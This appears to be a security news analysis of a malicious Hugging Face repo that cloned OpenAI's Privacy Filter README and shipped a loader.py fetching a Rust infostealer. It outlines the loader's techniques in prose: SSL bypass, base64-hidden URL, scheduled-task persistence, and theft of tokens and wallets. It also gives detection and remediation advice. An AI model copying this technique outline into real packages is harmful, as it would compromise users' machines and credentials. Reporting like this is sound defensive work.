Security firm HiddenLayer reported Tuesday that a malicious package on Hugging Face โ "Open-OSS/privacy-filter" โ had accumulated approximately 244,000 downloads and 667 likes by cloning the README of OpenAI's legitimate Privacy Filter project. The package shipped a `loader.py` that ran PowerShell commands to fetch a Rust-based infostealer targeting browsers, Discord sessions, cryptocurrency wallets, and system information on Windows hosts. Hugging Face removed the repo after the report. HiddenLayer notes the download count "may have been artificially inflated by the attackers to make the model seem more popular," but the package still reached top trending status in under 18 hours. Anyone who actually executed `loader.py` is advised to treat their system as compromised.
The attack vector wasn't novel โ it's the same shape AI-marketplace security researchers have been flagging for two years: typosquatted namespace, cloned README, malicious loader code hidden in a Python file that isn't the model weights anyone is downloading for. Specifically, `loader.py` disabled SSL verification, base64-decoded a URL, downloaded batch files, and set up persistence via scheduled tasks masquerading as Microsoft Edge updates. The Rust infostealer payload is the contemporary commodity-malware shape โ browser cookies, Discord tokens, crypto wallet `.dat` files, system fingerprints โ sold and reused across dozens of distinct campaigns. HiddenLayer reported it; Hugging Face's response was takedown-after-report, not detection-before-trending. The 244,000 download count is the part everyone should pause on: even if half is bot inflation, that's still tens of thousands of likely-real machines that pulled the package.
Hugging Face has been the de-facto distribution point for open-source AI models since 2022, with the marketplace shape โ public repos, anonymous-friendly publishing, namespace squatting permitted, README cloning undetected โ that npm, PyPI, and Docker Hub spent the last decade trying to harden. Two years after academic work first flagged these issues (the 2024 papers on Hugging Face pickle vulnerabilities) and after several smaller incidents in the interim, the marketplace still doesn't run automatic README-similarity detection on uploads, automatic namespace-impersonation checks, or holdback periods on trending status until human review. The Open-OSS/privacy-filter case is the first one with download numbers loud enough to force the conversation. Expect a HiddenLayer/Manifold-style market for ML-supply-chain security products to grow on the back of it โ Manifold's Manifest MCP-server scoring product (announced separately this week) is the same shape applied to MCP servers; both are reading the same market gap.
If you've installed a "privacy-filter" model from Hugging Face recently โ especially from any "Open-OSS" namespace โ check the file list for a `loader.py` containing PowerShell plus base64-encoded URLs, and if found, treat the host as compromised: rotate Discord tokens, browser-saved credentials, crypto wallet keys, and anything cached on disk. More broadly, the lesson for anyone using Hugging Face in production: namespace-pinning is doing more work than people realized, and "popular" is not a security signal โ top-trending in under 18 hours with cloned README and malicious loader is a threat shape, not an aberration. Watch for HF to ship namespace-impersonation detection and review-before-trending controls over the next quarter; if they don't, the market for third-party scanners (HiddenLayer, Manifold, and the wave behind them) is the bet.